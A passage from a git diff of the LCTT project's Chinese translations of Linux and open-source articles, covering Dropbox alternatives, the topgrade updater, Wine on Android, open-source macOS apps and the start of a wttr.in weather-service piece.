它的主要特点——文件共享和文档写作功能和 Dropbox 的功能相似。它们的主要区别(除了它的[开源协议][3])是你的文件可以托管在你的私人 Linux 服务器或云上,给予用户对自己数据完全的控制权。(自托管是本文所列应用的一个普遍的功能。)
|
|
||||||
|
|
||||||
使用 ownCloud,你可以通过 Linux、MacOS 或 Windows 的客户端和安卓、iOS 的移动应用程序来同步和访问文件。你还可以通过密码保护的链接分享给其他人来协作或者上传和下载。数据传输通过端到端加密(E2EE)和 SSL 加密来保护安全。你还可以通过使用它[marketplace][4]中的各种各样的第三方应用来扩展它的功能。当然,他也提供付费的,商业许可的企业版本。
|
|
||||||
|
|
||||||
ownCloud 提供了详尽的[文档][5],包括安装指南和这对用户、管理员、开发者的手册。你可以从 GitHub 仓库中获取它的[源码][6]。
|
|
||||||
|
|
||||||
### NextCloud
|
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/nextcloud.png)
|
|
||||||
|
|
||||||
[NextCloud][7]在2016年从 ownCloud 脱离出来,并且具有很多相同的功能。 NextCloud 以它的高安全性和法规遵守作为它们的一个独特的[推崇的卖点][8]。它具有 HIPAA (healthcare) 和 GDPR (隐私) 法规遵守功能, 并提供广泛的数据政策执行、加密、用户管理和审核功能。它还在传输和暂停期间对数据进行加密, 并且集成了移动设备管理和身份验证机制 (包括 LDAP/AD、单点登录、双因素身份验证等)。
|
|
||||||
像本文列表里的其他应用一样, NextCloud 是自托管的,但是如果你不想在自己的 Linux 上安装 NextCloud 服务器,公司与几个[提供商][9]伙伴合作,提供安装和托管, 并销售服务器、设备和服务支持。
|
|
||||||
在[marketplace][10]中提供了大量的apps来扩展它的功能。
|
|
||||||
|
|
||||||
NextCloud 的[文档][11]为用户、管理员和开发者提供了详细的信息,并且向它的论坛、IRC 频道和社交媒体提供了基于社区的支持。如果你想贡献或者获取它的源码,报告一个错误,查看它的 AGPLv3 许可,或者通过它的[GitHub 项目主页][12]了解更多。
|
|
||||||
### Seafile
|
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/seafile.png)
|
|
||||||
与ownCloud或NextCloud相比,[Seafile][13]或许没有花里胡哨的卖点(或者 app 生态),但是它能完成任务。实质上, 它充当了 Linux 服务器上的虚拟驱动器, 以扩展你的桌面存储, 并允许你有选择地使用密码保护和各种级别的权限 (即只读或读写) 共享文件。
|
|
||||||
|
|
||||||
它的协作的功能包括文件夹权限控制,密码保护的下载链接和像Git一样的版本控制和保留。文件使用双因素身份验证、文件加密和 AD/LDAP 集成进行保护, 并且可以从 Windows、MacOS、Linux、iOS 或 Android 设备进行访问。
|
|
||||||
|
|
||||||
更多详细信息, 请访问 Seafile 的[GitHub仓库][14]、[服务手册][15]、[wiki][16]和[论坛][17]。请注意, Seafile 的社区版在[GPLv2][18]下获得许可, 但其专业版不是开源的。
|
|
||||||
### OnionShare
|
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/onionshare.png)
|
|
||||||
|
|
||||||
[OnionShare][19]是一个很酷的应用: 如果你想匿名,它允许你安全地共享单个文件或文件夹。不需要设置或维护服务器,所有你需要做的就是[下载和安装][20] 无论是在 MacOS, Windows 还是 Linux 上。文件始终在你自己的计算机上; 当你共享文件时, OnionShare创建一个 web 服务器, 使其可作为 Tor 洋葱服务访问, 并生成一个不可猜测的 .onion URL, 这个URL允许收件人通过[ Tor 浏览器][21]获取文件。
|
|
||||||
|
|
||||||
你可以设置文件共享的限制, 例如限制可以下载的次数或使用自动停止计时器, 这会设置一个严格的过期日期/时间,超过这个期限便不可访问 (即使尚未访问该文件)。
|
|
||||||
|
|
||||||
OnionShare 在 [GPLv3][22] 之下被许可; 有关详细信息, 请查阅其 [GitHub 仓库][22], 其中还包括[文档][23], 介绍了这个易用文件共享软件的特点。
|
|
||||||
|
|
||||||
### Pydio Cells
|
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/pydiochat.png)
|
|
||||||
|
|
||||||
[Pydio Cells][24]在2018年5月推出了稳定版, 是对 Pydio 共享应用程序的核心服务器代码的全面检修。由于 Pydio 的基于 PHP 的后端的限制, 开发人员决定用 Go 服务器语言和微服务体系结构重写后端。(前端仍然是基于 PHP 的)。
|
|
||||||
|
|
||||||
Pydio Cells 包括通常的共享和版本控制功能, 以及应用程序中的消息接受、移动应用程序 (Android 和 iOS), 以及一种社交网络风格的协作方法。安全性包括基于 OpenID 连接的身份验证、rest 加密、安全策略等。企业发行版中包含着高级功能, 但在社区(家庭)版本中,对于大多数中小型企业和家庭用户来说,依然是足够的。
|
|
||||||
|
|
||||||
您可以 在Linux 和 MacOS[下载][25] Pydio Cells。有关详细信息, 请查阅 [文档常见问题][26]、[源码库][27] 和 [AGPLv3 许可证][28]
|
|
||||||
|
|
||||||
### 其他
|
|
||||||
如果以上选择不能满足你的需求,你可能想考虑其他开源的文件共享型应用。
|
|
||||||
* 如果你的主要目的是在设备间同步文件而不是分享文件,考察一下 [Syncthing][29]。
|
|
||||||
* 如果你是一个Git的粉丝而不需要一个移动应用。你可能更喜欢 [SparkleShare][30]。
|
|
||||||
* 如果你主要想要一个地方聚合所有你的个人数据, 看看 [Cozy][31]。
|
|
||||||
* 如果你想找一个轻量级的或者专注于文件共享的工具,考察一下 [Scott Nesbitt's review][32]——一个罕为人知的工具。
|
|
||||||
|
|
||||||
|
|
||||||
哪个是你最喜欢的开源文件共享应用?在评论中让我们知悉。
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://opensource.com/alternatives/dropbox
|
|
||||||
|
|
||||||
作者:[OPensource.com][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[distant1219](https://github.com/distant1219)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://opensource.com
|
|
||||||
[1]:https://opensource.com/open-source-way
|
|
||||||
[2]:https://owncloud.org/
|
|
||||||
[3]:https://www.gnu.org/licenses/agpl-3.0.html
|
|
||||||
[4]:https://marketplace.owncloud.com/
|
|
||||||
[5]:https://doc.owncloud.com/
|
|
||||||
[6]:https://github.com/owncloud
|
|
||||||
[7]:https://nextcloud.com/
|
|
||||||
[8]:https://nextcloud.com/secure/
|
|
||||||
[9]:https://nextcloud.com/providers/
|
|
||||||
[10]:https://apps.nextcloud.com/
|
|
||||||
[11]:https://nextcloud.com/support/
|
|
||||||
[12]:https://github.com/nextcloud
|
|
||||||
[13]:https://www.seafile.com/en/home/
|
|
||||||
[14]:https://github.com/haiwen/seafile
|
|
||||||
[15]:https://manual.seafile.com/
|
|
||||||
[16]:https://seacloud.cc/group/3/wiki/
|
|
||||||
[17]:https://forum.seafile.com/
|
|
||||||
[18]:https://github.com/haiwen/seafile/blob/master/LICENSE.txt
|
|
||||||
[19]:https://onionshare.org/
|
|
||||||
[20]:https://onionshare.org/#downloads
|
|
||||||
[21]:https://www.torproject.org/
|
|
||||||
[22]:https://github.com/micahflee/onionshare/blob/develop/LICENSE
|
|
||||||
[23]:https://github.com/micahflee/onionshare/wiki
|
|
||||||
[24]:https://pydio.com/en
|
|
||||||
[25]:https://pydio.com/download/
|
|
||||||
[26]:https://pydio.com/en/docs/faq
|
|
||||||
[27]:https://github.com/pydio/cells
|
|
||||||
[28]:https://github.com/pydio/pydio-core/blob/develop/LICENSE
|
|
||||||
[29]:https://syncthing.net/
|
|
||||||
[30]:http://www.sparkleshare.org/
|
|
||||||
[31]:https://cozy.io/en/
|
|
||||||
[32]:https://opensource.com/article/17/3/file-sharing-tools
|
|
@ -1,122 +0,0 @@
|
|||||||
如何在 Linux 中使用一个命令升级所有软件
|
|
||||||
======
|
|
||||||
|
|
||||||
![](https://www.ostechnix.com/wp-content/uploads/2018/06/topgrade-720x340.png)
|
|
||||||
|
|
||||||
众所周知,让我们的 Linux 系统保持最新状态涉及调用多个包管理器。比如说,在 Ubuntu 中,你无法使用 “sudo apt update 和 sudo apt upgrade” 命令升级所有软件。此命令仅升级使用 APT 包管理器安装的应用程序。你有可能使用 **cargo**、[**pip**][1]、**npm**、**snap** 、**flatpak** 或 [**Linuxbrew**][2] 包管理器安装了其他软件。你需要使用相应的包管理器才能使它们全部更新。再也不用这样了!跟 **“topgrade”** 打个招呼,这是一个可以一次性升级系统中所有软件的工具。
|
|
||||||
|
|
||||||
你无需运行每个包管理器来更新包。topgrade 工具通过检测已安装的软件包、工具、插件并运行相应的软件包管理器并使用一个命令更新 Linux 中的所有软件来解决这个问题。它是免费的、开源的,使用 **rust 语言**编写。它支持 GNU/Linux 和 Mac OS X.
|
|
||||||
|
|
||||||
### 在 Linux 中使用一个命令升级所有软件
|
|
||||||
|
|
||||||
topgrade 存在于 AUR 中。因此,你可以在任何基于 Arch 的系统中使用 [**Yay**][3 ] 助手程序安装它。
|
|
||||||
```
|
|
||||||
$ yay -S topgrade
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
在其他 Linux 发行版上,你可以使用 **cargo** 包管理器安装 topgrade。要安装 cargo 包管理器,请参阅以下链接。
|
|
||||||
|
|
||||||
然后,运行以下命令来安装 topgrade。
|
|
||||||
```
|
|
||||||
$ cargo install topgrade
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
安装完成后,运行 topgrade 以升级 Linux 系统中的所有软件。
|
|
||||||
```
|
|
||||||
$ topgrade
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
一旦调用了 topgrade,它将逐个执行以下任务。如有必要,系统会要求输入 root/sudo 用户密码。
|
|
||||||
|
|
||||||
1\. 运行系统的包管理器:
|
|
||||||
|
|
||||||
* Arch:运行 **yay** 或者回退到 [**pacman**][4]
|
|
||||||
* CentOS/RHEL:运行 `yum upgrade`
|
|
||||||
* Fedora :运行 `dnf upgrade`
|
|
||||||
* Debian/Ubuntu:运行 `apt update 和 apt dist-upgrade`
|
|
||||||
* Linux/macOS:运行 `brew update 和 brew upgrade`
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
2\. 检查 Git 是否跟踪了以下路径。如果有,则拉取它们:
|
|
||||||
|
|
||||||
* ~/.emacs.d (无论你使用 **Spacemacs** 还是自定义配置都应该可用)
|
|
||||||
* ~/.zshrc
|
|
||||||
* ~/.oh-my-zsh
|
|
||||||
* ~/.tmux
|
|
||||||
* ~/.config/fish/config.fish
|
|
||||||
* 自定义路径
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
3\. Unix:运行 **zplug** 更新
|
|
||||||
|
|
||||||
4\. Unix:使用 **TPM** 升级 **tmux** 插件
|
|
||||||
|
|
||||||
5\. 运行 **Cargo install-update**
|
|
||||||
|
|
||||||
6\. 升级 **Emacs** 包
|
|
||||||
|
|
||||||
7\. 升级 Vim 包。对以下插件框架均可用:
|
|
||||||
|
|
||||||
* NeoBundle
|
|
||||||
* [**Vundle**][5]
|
|
||||||
* Plug
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
8\. 升级 [**NPM**][6]全局安装的包
|
|
||||||
|
|
||||||
9\. 升级 **Atom** 包
|
|
||||||
|
|
||||||
10\. 升级 [**Flatpak**][7] 包
|
|
||||||
|
|
||||||
11\. 升级 [**snap**][8] 包
|
|
||||||
|
|
||||||
12\. ** Linux:**运行 **fwupdmgr**显示固件升级。 (仅查看。实际不会执行升级)
|
|
||||||
|
|
||||||
13\. 运行自定义命令。
|
|
||||||
|
|
||||||
最后,topgrade 将运行 **needrestart** 以重新启动所有服务。在 Mac OS X 中,它会升级 App Store 程序。
|
|
||||||
|
|
||||||
我的 Ubuntu 18.04 LTS 测试环境的示例输出:
|
|
||||||
|
|
||||||
![][10]
|
|
||||||
|
|
||||||
好处是如果一个任务失败,它将自动运行下一个任务并完成所有其他后续任务。最后,它将显示摘要,其中包含运行的任务数量,成功的数量和失败的数量等详细信息。
|
|
||||||
|
|
||||||
![][11]
|
|
||||||
|
|
||||||
**建议阅读:**
|
|
||||||
|
|
||||||
就个人而言,我喜欢创建一个像 topgrade 程序的想法,并使用一个命令升级使用各种包管理器安装的所有软件。我希望你也觉得它有用。还有更多的好东西。敬请关注!
|
|
||||||
|
|
||||||
干杯!
|
|
||||||
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://www.ostechnix.com/how-to-upgrade-everything-using-a-single-command-in-linux/
|
|
||||||
|
|
||||||
作者:[SK][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[geekpi](https://github.com/geekpi)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://www.ostechnix.com/author/sk/
|
|
||||||
[1]:https://www.ostechnix.com/manage-python-packages-using-pip/
|
|
||||||
[2]:https://www.ostechnix.com/linuxbrew-common-package-manager-linux-mac-os-x/
|
|
||||||
[3]:https://www.ostechnix.com/yay-found-yet-another-reliable-aur-helper/
|
|
||||||
[4]:https://www.ostechnix.com/getting-started-pacman/
|
|
||||||
[5]:https://www.ostechnix.com/manage-vim-plugins-using-vundle-linux/
|
|
||||||
[6]:https://www.ostechnix.com/manage-nodejs-packages-using-npm/
|
|
||||||
[7]:https://www.ostechnix.com/flatpak-new-framework-desktop-applications-linux/
|
|
||||||
[8]:https://www.ostechnix.com/install-snap-packages-arch-linux-fedora/
|
|
||||||
[9]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
|
|
||||||
[10]:http://www.ostechnix.com/wp-content/uploads/2018/06/topgrade-1.png
|
|
||||||
[11]:http://www.ostechnix.com/wp-content/uploads/2018/06/topgrade-2.png
|
|
@ -0,0 +1,130 @@
|
|||||||
|
如何在 Android 上借助 Wine 来运行 Windows Apps
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-featured-image.jpg)
|
||||||
|
|
||||||
|
Wine(是 Linux 上的程序,不是你喝的葡萄酒)是在类 Unix 操作系统上运行 Windows 程序的一个自由开源的兼容层。创建于 1993 年,借助它你可以在 Linux 和 macOS 操作系统上运行很多 Windows 程序,虽然有时可能还需要做一些小修改。现在,Wine 项目已经发布了 3.0 版本,这个版本兼容你的 Android 设备。
|
||||||
|
|
||||||
|
在本文中,我们将向你展示,在你的 Android 设备上如何借助 Wine 来运行 Windows Apps。
|
||||||
|
|
||||||
|
**相关阅读** : [如何使用 Winepak 在 Linux 上轻松安装 Windows 游戏][1]
|
||||||
|
|
||||||
|
### 在 Wine 上你可以运行什么?
|
||||||
|
|
||||||
|
Wine 只是一个兼容层,不是一个全功能的仿真器,因此,你需要一个 x86 的 Android 设备才能完全发挥出它的优势。但是,大多数消费者手中的 Android 设备都是基于 ARM 的。
|
||||||
|
|
||||||
|
因为大多数人使用的是基于 ARM 的 Android 设备,所以有一个限制,只有适配在 Windows RT 上运行的那些 App 才能够使用 Wine 在基于 ARM 的 Android 上运行。但是随着发展,能够在 ARM 设备上运行的软件数量越来越多。你可以在 XDA 开发者论坛上的这个 [帖子][2] 中找到兼容的这些 App 的清单。
|
||||||
|
|
||||||
|
在 ARM 上能够运行的一些 App 的例子如下:
|
||||||
|
|
||||||
|
* [Keepass Portable][3]: 一个密码钱包
|
||||||
|
* [Paint.NET][4]: 一个图像处理程序
|
||||||
|
* [SumatraPDF][5]: 一个 PDF 文档阅读器,也能够阅读一些其它的文档类型
|
||||||
|
* [Audacity][6]: 一个数字录音和编辑程序
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
也有一些再度流行的开源游戏,比如,[Doom][7] 和 [Quake 2][8],以及它们的开源克隆,比如 [OpenTTD][9],和《运输大亨》的一个版本。
|
||||||
|
|
||||||
|
随着 Wine 在 Android 上越来越普及,能够在基于 ARM 的 Android 设备上的 Wine 中运行的程序越来越多。Wine 项目致力于在 ARM 上使用 QEMU 去仿真 x86 的 CPU 指令,并且在项目完成后,能够在 Android 上运行的 App 将会迅速增加。
|
||||||
|
|
||||||
|
### 安装 Wine
|
||||||
|
|
||||||
|
在安装 Wine 之前,你首先需要去确保你的设备的设置是 “允许从 Play 商店之外的其它源下载和安装 APK”。为此,你需要去许可你的设备从未知源下载 App。
|
||||||
|
|
||||||
|
1\. 打开你手机上的设置,然后选择安全选项。
|
||||||
|
|
||||||
|
|
||||||
|
![wine-android-security][10]
|
||||||
|
|
||||||
|
2\. 向下拉并点击 “Unknown Sources” 的开关。
|
||||||
|
|
||||||
|
![wine-android-unknown-sources][11]
|
||||||
|
|
||||||
|
3\. 接受风险警告。
|
||||||
|
|
||||||
|
![wine-android-unknown-sources-warning][12]
|
||||||
|
|
||||||
|
4\. 打开 [Wine 安装站点][13],并点选列表中的第一个选择框。下载将自动开始。
|
||||||
|
|
||||||
|
![wine-android-download-button][14]
|
||||||
|
|
||||||
|
5\. 下载完成后,从下载目录中打开它,或者下拉通知菜单并点击这里的已完成的下载。
|
||||||
|
|
||||||
|
6\. 开始安装程序。它将提示你它需要访问和记录音频,并去修改、删除、和读取你的 SD 卡。你也可能为程序中使用的一些 App 授予访问音频的权利。
|
||||||
|
|
||||||
|
![wine-android-app-access][15]
|
||||||
|
|
||||||
|
7\. 安装完成后,点击程序图标去打开它。
|
||||||
|
|
||||||
|
![wine-android-icon-small][16]
|
||||||
|
|
||||||
|
当你打开 Wine 后,它模仿的是 Windows 7 的桌面。
|
||||||
|
|
||||||
|
![wine-android-desktop][17]
|
||||||
|
|
||||||
|
Wine 有一个缺点是,你得有一个外接键盘去进行输入。如果你在一个小屏幕上运行它,并且触摸非常小的按钮很困难,你也可以使用一个外接鼠标。
|
||||||
|
|
||||||
|
你可以通过触摸 “开始” 按钮去打开两个菜单 —— “控制面板”和“运行”。
|
||||||
|
|
||||||
|
![wine-android-start-button][18]
|
||||||
|
|
||||||
|
### 使用 Wine 来工作
|
||||||
|
|
||||||
|
当你触摸 “控制面板” 后你将看到三个选项 —— 添加/删除程序、游戏控制器、和 Internet 设定。
|
||||||
|
|
||||||
|
使用 “运行”,你可以打开一个对话框去运行命令。例如,通过输入 `iexplore` 来启动 “Internet Explorer”。
|
||||||
|
|
||||||
|
![wine-android-run][19]
|
||||||
|
|
||||||
|
### 在 Wine 中安装程序
|
||||||
|
|
||||||
|
1\. 在你的 Android 设备上下载应用程序(或通过云来同步)。一定要记住下载的程序保存的位置。
|
||||||
|
|
||||||
|
2\. 打开 Wine 命令提示符窗口。
|
||||||
|
|
||||||
|
3\. 输入程序的位置路径。如果你把下载的文件保存在 SD 卡上,输入:
|
||||||
|
|
||||||
|
```
|
||||||
|
cd sdcard/Download/[filename.exe]
|
||||||
|
```
|
||||||
|
|
||||||
|
4\. 在 Android 上运行 Wine 中的文件,只需要简单地输入 EXE 文件的名字即可。
|
||||||
|
|
||||||
|
如果这个 ARM 就绪的文件是兼容的,它将会运行。如果不兼容,你将看到一大堆错误信息。在这种情况下,在 Android 上的 Wine 中安装的 Windows 软件可能会损坏或丢失。
|
||||||
|
|
||||||
|
这个在 Android 上使用的新版本的 Wine 仍然有许多问题。它并不能在所有的 Android 设备上正常工作。它可以在我的 Galaxy S6 Edge 上运行的很好,但是在我的 Galaxy Tab 4 上却不能运行。许多游戏也不能正常运行,因为图形驱动还不支持 Direct3D。因为触摸屏还不是全扩展的,所以你需要一个外接的键盘和鼠标才能很轻松地操作它。
|
||||||
|
|
||||||
|
即便是在早期阶段的发行版中存在这样那样的问题,但是这种技术还是值得深思的。当然了,你要想在你的 Android 智能手机上运行 Windows 程序而不出问题,可能还需要等待一些时日。
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://www.maketecheasier.com/run-windows-apps-android-with-wine/
|
||||||
|
|
||||||
|
作者:[Tracey Rosenberger][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[qhwdw](https://github.com/qhwdw)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://www.maketecheasier.com/author/traceyrosenberger/
|
||||||
|
[1]:https://www.maketecheasier.com/winepak-install-windows-games-linux/ "How to Easily Install Windows Games on Linux with Winepak"
|
||||||
|
[2]:https://forum.xda-developers.com/showthread.php?t=2092348
|
||||||
|
[3]:http://downloads.sourceforge.net/keepass/KeePass-2.20.1.zip
|
||||||
|
[4]:http://forum.xda-developers.com/showthread.php?t=2411497
|
||||||
|
[5]:http://forum.xda-developers.com/showthread.php?t=2098594
|
||||||
|
[6]:http://forum.xda-developers.com/showthread.php?t=2103779
|
||||||
|
[7]:http://forum.xda-developers.com/showthread.php?t=2175449
|
||||||
|
[8]:http://forum.xda-developers.com/attachment.php?attachmentid=1640830&amp;d=1358070370
|
||||||
|
[9]:http://forum.xda-developers.com/showpost.php?p=36674868&amp;postcount=151
|
||||||
|
[10]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-security.png "wine-android-security"
|
||||||
|
[11]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-unknown-sources.jpg "wine-android-unknown-sources"
|
||||||
|
[12]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-unknown-sources-warning.png "wine-android-unknown-sources-warning"
|
||||||
|
[13]:https://dl.winehq.org/wine-builds/android/
|
||||||
|
[14]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-download-button.png "wine-android-download-button"
|
||||||
|
[15]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-app-access.jpg "wine-android-app-access"
|
||||||
|
[16]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-icon-small.jpg "wine-android-icon-small"
|
||||||
|
[17]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-desktop.png "wine-android-desktop"
|
||||||
|
[18]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-start-button.png "wine-android-start-button"
|
||||||
|
[19]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-Run.png "wine-android-run"
|
@ -0,0 +1,74 @@
|
|||||||
|
15 个适用于 MacOS 的开源应用程序
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/computer_keyboard_laptop_development_blue.png?itok=IfckxN48)
|
||||||
|
|
||||||
|
只要有可能的情况下,我都会去选择使用开源工具。不久之前,我回到大学去攻读教育领导学硕士学位。即便是我将喜欢的 Linux 笔记本电脑换成了一台 MacBook Pro(因为我不能确定校园里能够接受 Linux),我还是决定继续使用我喜欢的工具,哪怕是在 MacOS 上也是如此。
|
||||||
|
|
||||||
|
幸运的是,它很容易,并且没有哪个教授质疑过我用的是什么软件。即然如此,我就不能保守秘密。
|
||||||
|
|
||||||
|
我知道,我的一些同学最终会在学区担任领导职务,因此,我与我的那些使用 MacOS 或 Windows 的同学分享了关于下面描述的这些开源软件。毕竟,开源软件是真正地自由和友好的。我也希望他们去了解它,并且愿意以很少的一些成本去提供给他们的学生去使用这些世界级的应用程序。他们中的大多数人都感到很惊讶,因为,众所周知,开源软件除了有像你和我这样的用户之外,压根就没有销售团队。
|
||||||
|
|
||||||
|
### 我的 MacOS 学习曲线
|
||||||
|
|
||||||
|
虽然大多数的开源工具都能像以前我在 Linux 上使用的那样工作,只是需要不同的安装方法。但是,经过这个过程,我学习了这些工具在 MacOS 上的一些细微差别。像 [yum][1]、[DNF][2]、和 [APT][3] 在 MacOS 的世界中压根不存在 — 我真的很怀念它们。
|
||||||
|
|
||||||
|
一些 MacOS 应用程序要求依赖项,并且安装它们要比我在 Linux 上习惯的方法困难很多。尽管如此,我仍然没有放弃。在这个过程中,我学会了如何在我的新平台上保留最好的软件。即便是 MacOS 大部分的核心也是 [开源的][4]。
|
||||||
|
|
||||||
|
此外,我的 Linux 的知识背景让我使用 MacOS 的命令行很轻松很舒适。我仍然使用命令行去创建和拷贝文件、添加用户、以及使用其它的像 cat、tac、more、less、和 tail 这样的 [实用工具][5]。
|
||||||
|
|
||||||
|
### 15 个适用于 MacOS 的非常好的开源应用程序
|
||||||
|
|
||||||
|
* 在大学里,要求我使用 DOCX 的电子版格式来提交我的工作,而这其实很容易,最初我使用的是 [OpenOffice][6],而后来我使用的是 [LibreOffice][7] 去完成我的论文。
|
||||||
|
* 当我因为演示需要去做一些图像时,我使用的是我最喜欢的图像应用程序 [GIMP][8] 和 [Inkscape][9]。
|
||||||
|
* 我喜欢的播客创建工具是 [Audacity][10]。它比起 Mac 上搭载的专有的应用程序更加简单。我使用它去录制访谈和为视频演示创建配乐。
|
||||||
|
* 在 MacOS 上我最早发现的多媒体播放器是 [VideoLan][11] (VLC)。
|
||||||
|
* MacOS 的内置专有视频创建工具是一个非常好的产品,但是你也可以很轻松地去安装和使用 [OpenShot][12],它是一个非常好的内容创建工具。
|
||||||
|
* 当我需要在我的客户端上分析网络时,我在我的 Mac 上使用了易于安装的 [Nmap][13] (Network Mapper) 和 [Wireshark][14] 工具。
|
||||||
|
* 当我为图书管理员和其它教育工作者提供培训时,我在 MacOS 上使用 [VirtualBox][15] 去做 Raspbian、Fedora、Ubuntu、和其它 Linux 发行版的示范操作。
|
||||||
|
* 我使用 [Etcher.io][16] 在我的 MacBook 上制作了一个引导盘,下载 ISO 文件,将它刻录到一个 U 盘上。
|
||||||
|
* 我认为 [Firefox][17] 比起 MacBook Pro 自带的专有浏览器更易用更安全,并且它允许我跨操作系统去同步我的书签。
|
||||||
|
* 当我使用电子书阅读器时,[Calibre][18] 是当之无愧的选择。它很容易去下载和安装,你甚至只需要几次点击就能将它配置为一台 [教室中使用的电子书服务器][19]。
|
||||||
|
* 最近我给中学的学习教 Python 课程,我发现它可以很容易地从 [Python.org][20] 上下载和安装 Python 3 及 IDLE3 编辑器。我也喜欢学习数据科学,并与学生分享。不论你是对 Python 还是 R 感兴趣,我都建议你下载和 [安装][21] [Anaconda 发行版][22]。它包含了非常好的 iPython 编辑器、RStudio、Jupyter Notebooks、和 JupyterLab,以及其它一些应用程序。
|
||||||
|
* [HandBrake][23] 是一个将你家里的旧的视频 DVD 转成 MP4 的工具,这样你就可以将它们共享到 YouTube、Vimeo、或者你的 MacOS 上的 [Kodi][24] 服务器上。
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
现在轮到你了:你在 MacOS(或 Windows)上都使用什么样的开源软件?在下面的评论区共享出来吧。
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://opensource.com/article/18/7/open-source-tools-macos
|
||||||
|
|
||||||
|
作者:[Don Watkins][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[qhwdw](https://github.com/qhwdw)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://opensource.com/users/don-watkins
|
||||||
|
[1]:https://en.wikipedia.org/wiki/Yum_(software)
|
||||||
|
[2]:https://en.wikipedia.org/wiki/DNF_(software)
|
||||||
|
[3]:https://en.wikipedia.org/wiki/APT_(Debian)
|
||||||
|
[4]:https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/SystemTechnology/SystemTechnology.html
|
||||||
|
[5]:https://www.gnu.org/software/coreutils/coreutils.html
|
||||||
|
[6]:https://www.openoffice.org/
|
||||||
|
[7]:https://www.libreoffice.org/
|
||||||
|
[8]:https://www.gimp.org/
|
||||||
|
[9]:https://inkscape.org/en/
|
||||||
|
[10]:https://www.audacityteam.org/
|
||||||
|
[11]:https://www.videolan.org/index.html
|
||||||
|
[12]:https://www.openshot.org/
|
||||||
|
[13]:https://nmap.org/
|
||||||
|
[14]:https://www.wireshark.org/
|
||||||
|
[15]:https://www.virtualbox.org/
|
||||||
|
[16]:https://etcher.io/
|
||||||
|
[17]:https://www.mozilla.org/en-US/firefox/new/
|
||||||
|
[18]:https://calibre-ebook.com/
|
||||||
|
[19]:https://opensource.com/article/17/6/raspberrypi-ebook-server
|
||||||
|
[20]:https://www.python.org/downloads/release/python-370/
|
||||||
|
[21]:https://opensource.com/article/18/4/getting-started-anaconda-python
|
||||||
|
[22]:https://www.anaconda.com/download/#macos
|
||||||
|
[23]:https://handbrake.fr/
|
||||||
|
[24]:https://kodi.tv/download
|
@ -0,0 +1,118 @@
|
|||||||
|
使用 Wttr.in 在你的终端中显示天气预报
|
||||||
|
======
|
||||||
|
**[wttr.in][1] 是一个功能丰富的天气预报服务,它支持在命令行显示天气**。它可以自动检测你的位置(根据你的 IP 地址),支持指定位置或搜索地理位置(如城市、山区等)等。哦,另外**你不需要安装它 - 你只需要使用 cURL 或 Wget**(见下文)。
|
||||||
|
|
||||||
|
wttr.in 功能包括:
|
||||||
|
|
||||||
|
* **显示当前天气以及 3 天天气预报,分为早晨、中午、傍晚和夜晚**(包括温度范围、风速和风向、可见度、降水量和概率)
|
||||||
|
|
||||||
|
* **可以显示月相**
|
||||||
|
|
||||||
|
* **基于你的 IP 地址自动检测位置**
|
||||||
|
|
||||||
|
* **允许指定城市名称、3 字母的机场代码、区域代码、GPS 坐标、IP 地址或域名**。你还可以指定地理位置,如湖泊、山脉、地标等)
